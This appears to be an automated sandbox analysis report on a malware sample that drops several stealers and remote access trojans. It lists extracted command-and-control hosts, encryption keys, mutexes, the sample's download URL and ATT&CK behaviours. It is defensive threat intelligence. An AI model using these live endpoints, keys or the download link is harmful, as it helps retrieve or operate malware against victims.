ades_stealer | hxxps://s3[.]us-east-1[.]wasabisys[.]com/vxugmwdb/2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Analysis

max time kernel
162s
max time network
175s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
21/04/2025, 17:32

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://s3.us-east-1.wasabisys.com/vxugmwdb/2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

96.248.52.125:8031

wzt5xcg.localto.net:1604

wzt5xcg.localto.net:5274

Mutex

adobe_6SI8OkPnk

Attributes

delay
3
install
true
install_file
update.exe
install_folder
%Temp%

aes.plain

Extracted

Family

lumma

https://zestmodp.top/zeda

https://jawdedmirror.run/ewqd

https://changeaie.top/geps

https://lonfgshadow.live/xawi

https://liftally.top/xasj

https://nighetwhisper.top/lekd

https://salaccgfa.top/gsooz

https://owlflright.digital/qopy

https://yshiningrstars.help/api

https://mercharena.biz/api

https://stormlegue.com/api

https://blast-hubs.com/api

https://oblastikcn.com/api

https://naturewsounds.help/api

https://fxreshideas.tech/api

https://shiningrstars.help/api

https://pstormlegue.com/api

https://blastikcn.com/api

https://unaturewsounds.help/api

Extracted

Family

xworm

Version

5.0

127.0.0.1:8304

owners-encryption.gl.at.ply.gg:8304

applications-scenario.gl.at.ply.gg:53694

Mutex

vmpbQXCAUZiPKlSw

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Hubert Pilarczyk

pawela827-35962.portmap.host:35962

Mutex

ca431979-125b-480f-adac-43c48c1e1832

Attributes

encryption_key
39F4E87BBB832270AC54CA5065E707DFB3689A56
install_name
vsjitdebuggerui.exe
log_directory
CEF
reconnect_delay
3000
startup_key
Proces hosta dla zadań systemu Windows
subdirectory
3880

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

192.168.100.10:4782

llordiWasHere-55715.portmap.host:55715

Mutex

c30cf3c1-7b97-4704-8ee2-11d4f4a4a673

Attributes

encryption_key
5B006AB32BA3239F1231429040DABB9E56ECB26B
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

RuntimeBroker

siembonik-44853.portmap.host:44853

Mutex

df483a08-855b-4bf5-bdcb-174788919889

Attributes

encryption_key
A8573AD4438B1D5F6207F7C03CCC7F1E2D4B13DF
install_name
RuntimeBroker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
RuntimeBroker
subdirectory
am1

Extracted

Family

quasar

Version

1.4.1

Botnet

RAT 5 (EPIC VERISON)

serveo.net:11453

Mutex

7a1301f7-dc6f-4847-a8ee-ca627a9efa0f

Attributes

encryption_key
3B793156AD6D884F51309D0E992DAA75D03D2783
install_name
Application Frame Host.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Microsoft
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Main

tpinauskas-54803.portmap.host:54803

Mutex

8422dcc2-b8bd-4080-a017-5b62524b6546

Attributes

encryption_key
2EFF7393DC1BD9FBDDD61A780B994B8166BAB8EC
install_name
Win64.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Win64
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

CleanerV2

192.168.4.185:4782

Mutex

1607a026-352e-4041-bc1f-757dd6cd2e95

Attributes

encryption_key
73BCD6A075C4505333DE1EDC77C7242196AF9552
install_name
Client.exe
log_directory
Clean
reconnect_delay
3000
startup_key
CleanerV2
subdirectory
SubDir

Extracted

Family

xworm

Version

3.1

camp.zapto.org:7771

Attributes

Install_directory
%AppData%
install_file
USB.exe

Signatures

AdesStealer
AdesStealer is a modular stealer written in C#.
stealer ades_stealer
Ades_stealer family
ades_stealer
Ammyy Admin
Remote admin tool with various capabilities.
rat ammyyadmin

AmmyyAdmin payload 1 IoCs

resource	yara_rule
behavioral1/files/0x001900000002b3f0-4858.dat	family_ammyyadmin

Ammyyadmin family
ammyyadmin
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/files/0x001700000002b624-5970.dat	family_umbral

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral1/files/0x001900000002b546-5098.dat	family_vidar_v7

Detect Xworm Payload 13 IoCs

resource	yara_rule
behavioral1/files/0x001a00000002b3b0-1942.dat	family_xworm
behavioral1/memory/1632-1947-0x0000000000BE0000-0x0000000000BF2000-memory.dmp	family_xworm
behavioral1/files/0x001d00000002b2df-2041.dat	family_xworm
behavioral1/memory/4952-2049-0x0000000000EB0000-0x0000000000EF2000-memory.dmp	family_xworm
behavioral1/files/0x001a00000002b3a5-2438.dat	family_xworm
behavioral1/memory/9892-2469-0x0000000000580000-0x00000000005C2000-memory.dmp	family_xworm
behavioral1/memory/10656-2707-0x00000000003C0000-0x00000000003D8000-memory.dmp	family_xworm
behavioral1/files/0x001900000002b3ba-2597.dat	family_xworm
behavioral1/files/0x001a00000002b38f-2565.dat	family_xworm
behavioral1/files/0x001700000002b61d-5919.dat	family_xworm
behavioral1/files/0x001900000002b3e8-5910.dat	family_xworm
behavioral1/files/0x0004000000025c2e-5814.dat	family_xworm
behavioral1/files/0x001700000002b6f1-7129.dat	family_xworm

Detects AdesStealer 1 IoCs

resource	yara_rule
behavioral1/files/0x0002000000025c93-2844.dat	family_adesstealer

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 35 IoCs

resource	yara_rule
behavioral1/files/0x001d00000002b1c1-2065.dat	family_quasar
behavioral1/memory/2220-2072-0x0000000000710000-0x0000000000A34000-memory.dmp	family_quasar
behavioral1/files/0x001e00000002b1bf-2101.dat	family_quasar
behavioral1/memory/3060-2113-0x0000000000CF0000-0x0000000001014000-memory.dmp	family_quasar
behavioral1/files/0x001a00000002b348-2131.dat	family_quasar
behavioral1/memory/2800-2137-0x0000000000960000-0x0000000000C84000-memory.dmp	family_quasar
behavioral1/files/0x001b00000002b34d-2186.dat	family_quasar
behavioral1/files/0x001a00000002b34b-2193.dat	family_quasar
behavioral1/memory/7776-2236-0x0000000000DA0000-0x00000000010C4000-memory.dmp	family_quasar
behavioral1/files/0x001a00000002b35c-2246.dat	family_quasar
behavioral1/memory/5964-2257-0x0000000000F30000-0x0000000001270000-memory.dmp	family_quasar
behavioral1/memory/3444-2286-0x00000000001B0000-0x00000000004D4000-memory.dmp	family_quasar
behavioral1/files/0x001c00000002b369-2423.dat	family_quasar
behavioral1/memory/9408-2463-0x0000000000820000-0x0000000000B44000-memory.dmp	family_quasar
behavioral1/files/0x001900000002b3d6-2612.dat	family_quasar
behavioral1/files/0x0004000000024ff8-2737.dat	family_quasar
behavioral1/files/0x0004000000025a0a-2786.dat	family_quasar
behavioral1/files/0x001e00000002b39d-4203.dat	family_quasar
behavioral1/files/0x000c000000025007-4209.dat	family_quasar
behavioral1/files/0x0002000000025cb0-2832.dat	family_quasar
behavioral1/files/0x001b00000002b3a1-2606.dat	family_quasar
behavioral1/files/0x001e00000002b36a-2591.dat	family_quasar
behavioral1/files/0x001900000002b3ec-4272.dat	family_quasar
behavioral1/files/0x001c00000002b38b-4355.dat	family_quasar
behavioral1/files/0x001b00000002b371-4344.dat	family_quasar
behavioral1/files/0x0003000000026234-4287.dat	family_quasar
behavioral1/files/0x0003000000025ca2-4660.dat	family_quasar
behavioral1/files/0x001a00000002b4c0-5337.dat	family_quasar
behavioral1/files/0x001700000002b599-5332.dat	family_quasar
behavioral1/files/0x001800000002b559-5321.dat	family_quasar
behavioral1/files/0x001a00000002b42c-4744.dat	family_quasar
behavioral1/files/0x001900000002b4cf-5856.dat	family_quasar
behavioral1/files/0x001700000002b634-6170.dat	family_quasar
behavioral1/files/0x001700000002b63d-6126.dat	family_quasar
behavioral1/files/0x001700000002b712-6971.dat	family_quasar

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 11 IoCs

rat

resource	yara_rule
behavioral1/files/0x001900000002b3ae-1917.dat	family_asyncrat
behavioral1/files/0x001b00000002b34a-2161.dat	family_asyncrat
behavioral1/files/0x0002000000026112-2885.dat	family_asyncrat
behavioral1/files/0x0005000000025a2b-2876.dat	family_asyncrat
behavioral1/files/0x001900000002b3ed-4197.dat	family_asyncrat
behavioral1/files/0x001c00000002b37d-3957.dat	family_asyncrat
behavioral1/files/0x0005000000025a17-2727.dat	family_asyncrat
behavioral1/files/0x001900000002b45f-4382.dat	family_asyncrat
behavioral1/files/0x001800000002b54d-5234.dat	family_asyncrat
behavioral1/files/0x001700000002b62f-5986.dat	family_asyncrat
behavioral1/files/0x001a00000002b4b0-5927.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
9100	powershell.exe
1716	powershell.exe
6856	powershell.exe
5068	powershell.exe
6076	powershell.exe
18184	powershell.exe
20524	powershell.exe
5460	powershell.exe
3116	powershell.exe
4360	powershell.exe
4584	powershell.exe
9100	powershell.exe
14728	powershell.exe
3140	powershell.exe

Downloads MZ/PE file 5 IoCs

flow	pid	Process
128	4884	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
124	4884	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
124	4884	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
22	5980	msedge.exe
130	4884	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe

Modifies Windows Firewall 2 TTPs 6 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
20576	netsh.exe
21812	netsh.exe
24464	netsh.exe
13604	netsh.exe
12228	netsh.exe
20724	netsh.exe

Uses browser remote debugging 2 TTPs 1 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
13116	chrome.exe

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x001b00000002b37f-1905.dat	aspack_v212_v242

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1660	cmd.exe
3804	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
4884	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
3144	Built.exe
6696	Built.exe
6512	connector1.exe
6104	TPB-1.exe

Loads dropped DLL 18 IoCs

pid	Process
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe
6696	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0002000000026230-4138.dat	themida
behavioral1/files/0x001900000002b497-4654.dat	themida
behavioral1/files/0x001700000002b635-5961.dat	themida

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/460-2125-0x00007FF716220000-0x00007FF71645A000-memory.dmp	vmprotect
behavioral1/memory/460-2123-0x00007FF716220000-0x00007FF71645A000-memory.dmp	vmprotect
behavioral1/files/0x001c00000002b338-2118.dat	vmprotect
behavioral1/memory/460-2128-0x00007FF716220000-0x00007FF71645A000-memory.dmp	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 50 IoCs

Web Service

T1102

flow	ioc
574	raw.githubusercontent.com
158	raw.githubusercontent.com
225	raw.githubusercontent.com
387	raw.githubusercontent.com
485	raw.githubusercontent.com
48	raw.githubusercontent.com
152	raw.githubusercontent.com
275	raw.githubusercontent.com
399	raw.githubusercontent.com
588	raw.githubusercontent.com
620	6.tcp.eu.ngrok.io
626	raw.githubusercontent.com
721	raw.githubusercontent.com
28	raw.githubusercontent.com
138	discord.com
151	raw.githubusercontent.com
285	raw.githubusercontent.com
301	raw.githubusercontent.com
377	raw.githubusercontent.com
384	raw.githubusercontent.com
172	raw.githubusercontent.com
182	raw.githubusercontent.com
192	raw.githubusercontent.com
398	raw.githubusercontent.com
471	raw.githubusercontent.com
491	raw.githubusercontent.com
731	raw.githubusercontent.com
177	raw.githubusercontent.com
274	raw.githubusercontent.com
278	raw.githubusercontent.com
457	raw.githubusercontent.com
594	raw.githubusercontent.com
683	raw.githubusercontent.com
695	raw.githubusercontent.com
88	discord.com
155	raw.githubusercontent.com
223	raw.githubusercontent.com
273	raw.githubusercontent.com
320	raw.githubusercontent.com
124	raw.githubusercontent.com
160	raw.githubusercontent.com
306	raw.githubusercontent.com
350	raw.githubusercontent.com
361	raw.githubusercontent.com
412	raw.githubusercontent.com
587	raw.githubusercontent.com
604	raw.githubusercontent.com
269	raw.githubusercontent.com
423	raw.githubusercontent.com
511	raw.githubusercontent.com

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
419	ip-api.com
479	ip-addr.es
633	ip-api.com
24	ip-api.com
331	api.ipify.org
331	ip-addr.es
375	api.ipify.org
415	api.ipify.org

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 1 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
19628	cmd.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0004000000024f9e-2653.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
1424	tasklist.exe
3064	tasklist.exe
4816	tasklist.exe
6556	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/6696-1669-0x00007FF8CD530000-0x00007FF8CDB95000-memory.dmp	upx
behavioral1/memory/6696-1670-0x00007FF8ECEC0000-0x00007FF8ECEE7000-memory.dmp	upx
behavioral1/memory/6696-1671-0x00007FF8F6010000-0x00007FF8F601F000-memory.dmp	upx
behavioral1/memory/6696-1685-0x00007FF8ECD60000-0x00007FF8ECD8B000-memory.dmp	upx
behavioral1/memory/6696-1687-0x00007FF8ECD30000-0x00007FF8ECD55000-memory.dmp	upx
behavioral1/memory/6696-1686-0x00007FF8F2090000-0x00007FF8F20A9000-memory.dmp	upx
behavioral1/memory/6696-1688-0x00007FF8CD3B0000-0x00007FF8CD52F000-memory.dmp	upx
behavioral1/memory/6696-1689-0x00007FF8ECC30000-0x00007FF8ECC49000-memory.dmp	upx
behavioral1/memory/6696-1690-0x00007FF8F5F80000-0x00007FF8F5F8D000-memory.dmp	upx
behavioral1/memory/6696-1691-0x00007FF8E7BC0000-0x00007FF8E7BF3000-memory.dmp	upx
behavioral1/memory/6696-1692-0x00007FF8CD530000-0x00007FF8CDB95000-memory.dmp	upx
behavioral1/memory/6696-1693-0x00007FF8E6970000-0x00007FF8E6A3E000-memory.dmp	upx
behavioral1/memory/6696-1696-0x00007FF8ECEC0000-0x00007FF8ECEE7000-memory.dmp	upx
behavioral1/memory/6696-1695-0x00007FF8CCE70000-0x00007FF8CD3A3000-memory.dmp	upx
behavioral1/memory/6696-1699-0x00007FF8F5BA0000-0x00007FF8F5BAD000-memory.dmp	upx
behavioral1/memory/6696-1698-0x00007FF8ECD60000-0x00007FF8ECD8B000-memory.dmp	upx
behavioral1/memory/6696-1697-0x00007FF8E7BA0000-0x00007FF8E7BB4000-memory.dmp	upx
behavioral1/memory/6696-1701-0x00007FF8CCDB0000-0x00007FF8CCE63000-memory.dmp	upx
behavioral1/memory/6696-1700-0x00007FF8F2090000-0x00007FF8F20A9000-memory.dmp	upx
behavioral1/memory/6696-1763-0x00007FF8ECD30000-0x00007FF8ECD55000-memory.dmp	upx
behavioral1/memory/6696-1818-0x00007FF8CD3B0000-0x00007FF8CD52F000-memory.dmp	upx
behavioral1/memory/6696-1858-0x00007FF8ECC30000-0x00007FF8ECC49000-memory.dmp	upx
behavioral1/memory/6696-1900-0x00007FF8E7BC0000-0x00007FF8E7BF3000-memory.dmp	upx
behavioral1/memory/6696-1907-0x00007FF8E6970000-0x00007FF8E6A3E000-memory.dmp	upx
behavioral1/memory/6696-1924-0x00007FF8CCE70000-0x00007FF8CD3A3000-memory.dmp	upx
behavioral1/memory/6696-1959-0x00007FF8CD530000-0x00007FF8CDB95000-memory.dmp	upx
behavioral1/memory/6696-1974-0x00007FF8CCDB0000-0x00007FF8CCE63000-memory.dmp	upx
behavioral1/memory/6696-1965-0x00007FF8CD3B0000-0x00007FF8CD52F000-memory.dmp	upx
behavioral1/memory/6696-1979-0x00007FF8CD530000-0x00007FF8CDB95000-memory.dmp	upx
behavioral1/memory/6696-1993-0x00007FF8CCDB0000-0x00007FF8CCE63000-memory.dmp	upx
behavioral1/memory/6696-2003-0x00007FF8E7BC0000-0x00007FF8E7BF3000-memory.dmp	upx
behavioral1/memory/6696-2002-0x00007FF8F5F80000-0x00007FF8F5F8D000-memory.dmp	upx
behavioral1/memory/6696-2001-0x00007FF8ECC30000-0x00007FF8ECC49000-memory.dmp	upx
behavioral1/memory/6696-2000-0x00007FF8CD3B0000-0x00007FF8CD52F000-memory.dmp	upx
behavioral1/memory/6696-1999-0x00007FF8ECD30000-0x00007FF8ECD55000-memory.dmp	upx
behavioral1/memory/6696-1998-0x00007FF8F2090000-0x00007FF8F20A9000-memory.dmp	upx
behavioral1/memory/6696-1997-0x00007FF8ECD60000-0x00007FF8ECD8B000-memory.dmp	upx
behavioral1/memory/6696-1996-0x00007FF8F6010000-0x00007FF8F601F000-memory.dmp	upx
behavioral1/memory/6696-1992-0x00007FF8F5BA0000-0x00007FF8F5BAD000-memory.dmp	upx
behavioral1/memory/6696-1991-0x00007FF8E7BA0000-0x00007FF8E7BB4000-memory.dmp	upx
behavioral1/memory/6696-1989-0x00007FF8E6970000-0x00007FF8E6A3E000-memory.dmp	upx
behavioral1/memory/6696-1995-0x00007FF8ECEC0000-0x00007FF8ECEE7000-memory.dmp	upx
behavioral1/memory/6696-1994-0x00007FF8CCE70000-0x00007FF8CD3A3000-memory.dmp	upx
behavioral1/files/0x001a00000002b34f-2224.dat	upx
behavioral1/memory/7812-2287-0x0000000000400000-0x0000000000487000-memory.dmp	upx
behavioral1/files/0x001600000002b3d8-2571.dat	upx
behavioral1/memory/10488-2731-0x0000000000400000-0x0000000000727000-memory.dmp	upx
behavioral1/memory/7540-2716-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral1/files/0x0004000000024fbf-2679.dat	upx
behavioral1/memory/7540-2400-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral1/files/0x001900000002b4cb-4893.dat	upx
behavioral1/files/0x001800000002b35b-4751.dat	upx
behavioral1/files/0x001a00000002b4c6-6053.dat	upx
behavioral1/files/0x001700000002b6cb-6031.dat	upx
behavioral1/files/0x001700000002b610-6675.dat	upx
behavioral1/files/0x001700000002b6e9-6624.dat	upx

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
17888	mshta.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 5 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001a00000002b39a-3860.dat	pyinstaller
behavioral1/files/0x001a00000002b397-2582.dat	pyinstaller
behavioral1/files/0x001a00000002b3d2-4666.dat	pyinstaller
behavioral1/files/0x0004000000025a87-5861.dat	pyinstaller
behavioral1/files/0x001700000002b60d-6601.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 4 IoCs

pid	pid_target	Process	procid_target
7472	5128	WerFault.exe	304
8228	4940	WerFault.exe	311
9944	10520	WerFault.exe
16272	13416	WerFault.exe	615

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	connector1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
13800	PING.EXE
10540	cmd.exe
23268	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
6420	netsh.exe
3160	cmd.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x001c00000002b3ad-5132.dat	nsis_installer_1
behavioral1/files/0x001c00000002b3ad-5132.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 22 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5580	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3040	WMIC.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
12328	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
7140	systeminfo.exe

Kills process with taskkill 8 IoCs

defense_evasion

pid	Process
712	taskkill.exe
6452	taskkill.exe
1588	taskkill.exe
4376	taskkill.exe
4520	taskkill.exe
3552	taskkill.exe
1336	taskkill.exe
9160	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133897303477437331"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2211465213-323295031-1970282057-1000\{59A5D730-B72E-4ECD-8D95-E1315FFD707E}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2211465213-323295031-1970282057-1000\{04D2EB8C-DF97-4D1C-A107-8C5C90350E6C}	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
20880	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce:Zone.Identifier	msedge.exe

